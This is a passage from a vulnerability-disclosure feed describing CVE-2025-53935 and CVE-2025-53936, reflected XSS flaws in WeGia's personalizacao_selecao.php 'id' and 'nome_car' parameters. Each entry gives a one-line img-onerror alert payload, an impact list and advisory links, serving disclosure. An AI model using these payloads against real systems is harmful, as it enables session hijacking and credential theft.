&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;XSS-PoC3&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-53935/image.png&amp;#34;
	width=&amp;#34;706&amp;#34;
	height=&amp;#34;853&amp;#34;
	srcset=&amp;#34;/p/cve-2025-53935/image_hu_465e3ff624cdf11d.png 480w, /p/cve-2025-53935/image_hu_8c5a3f2d6253bfd4.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;82&amp;#34;
		data-flex-basis=&amp;#34;198px&amp;#34;
	
&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-53935-cross-site-scripting-xss-reflected-endpoint-personalizacao_selecaophp-parameter-id&amp;#34;&amp;gt;CVE-2025-53935: Cross-Site Scripting (XSS) Reflected endpoint &amp;lt;code&amp;gt;personalizacao_selecao.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53935&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53935&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;personalizacao_selecao.php&amp;lt;/code&amp;gt; endpoint of the WeGia application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; parameter.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;POST /html/personalizacao_selecao.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;XSS-PoC3&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-53935/image.png&amp;#34;
	width=&amp;#34;706&amp;#34;
	height=&amp;#34;853&amp;#34;
	srcset=&amp;#34;/p/cve-2025-53935/image_hu_465e3ff624cdf11d.png 480w, /p/cve-2025-53935/image_hu_8c5a3f2d6253bfd4.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;82&amp;#34;
		data-flex-basis=&amp;#34;198px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-5x6v-h459-xjqh&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-5x6v-h459-xjqh&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;contributor&amp;#34;&amp;gt;Contributor
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Wed, 16 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-53936</title>
        <link>https://www.cvehunters.com/p/cve-2025-53936/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-53936/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-53936-cross-site-scripting-xss-reflected-endpoint-personalizacao_selecaophp-parameter-nome_car&amp;#34;&amp;gt;CVE-2025-53936: Cross-Site Scripting (XSS) Reflected endpoint &amp;lt;code&amp;gt;personalizacao_selecao.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;nome_car&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53936&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53936&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;personalizacao_selecao.php&amp;lt;/code&amp;gt; endpoint of the WeGia application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;nome_car&amp;lt;/code&amp;gt; parameter.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;POST /html/personalizacao_selecao.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;nome_car&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;XSS-PoC5&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-53936/image.png&amp;#34;
	width=&amp;#34;713&amp;#34;
	height=&amp;#34;856&amp;#34;
	srcset=&amp;#34;/p/cve-2025-53936/image_hu_b5a24124f1a5f7aa.png 480w, /p/cve-2025-53936/image_hu_c19d2cd3d802d084.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;83&amp;#34;
		data-flex-basis=&amp;#34;199px&amp;#34;
	
&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-53936-cross-site-scripting-xss-reflected-endpoint-personalizacao_selecaophp-parameter-nome_car&amp;#34;&amp;gt;CVE-2025-53936: Cross-Site Scripting (XSS) Reflected endpoint &amp;lt;code&amp;gt;personalizacao_selecao.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;nome_car&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53936&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53936&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;personalizacao_selecao.php&amp;lt;/code&amp;gt; endpoint of the WeGia application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;nome_car&amp;lt;/code&amp;gt; parameter.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;POST /html/personalizacao_selecao.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;nome_car&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;XSS-PoC5&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-53936/image.png&amp;#34;
	width=&amp;#34;713&amp;#34;
	height=&amp;#34;856&amp;#34;
	srcset=&amp;#34;/p/cve-2025-53936/image_hu_b5a24124f1a5f7aa.png 480w, /p/cve-2025-53936/image_hu_c19d2cd3d802d084.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;83&amp;#34;
		data-flex-basis=&amp;#34;199px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-34vc-q923-v26p&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-34vc-q923-v26p&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;contributor&amp;#34;&amp;gt;Contributor
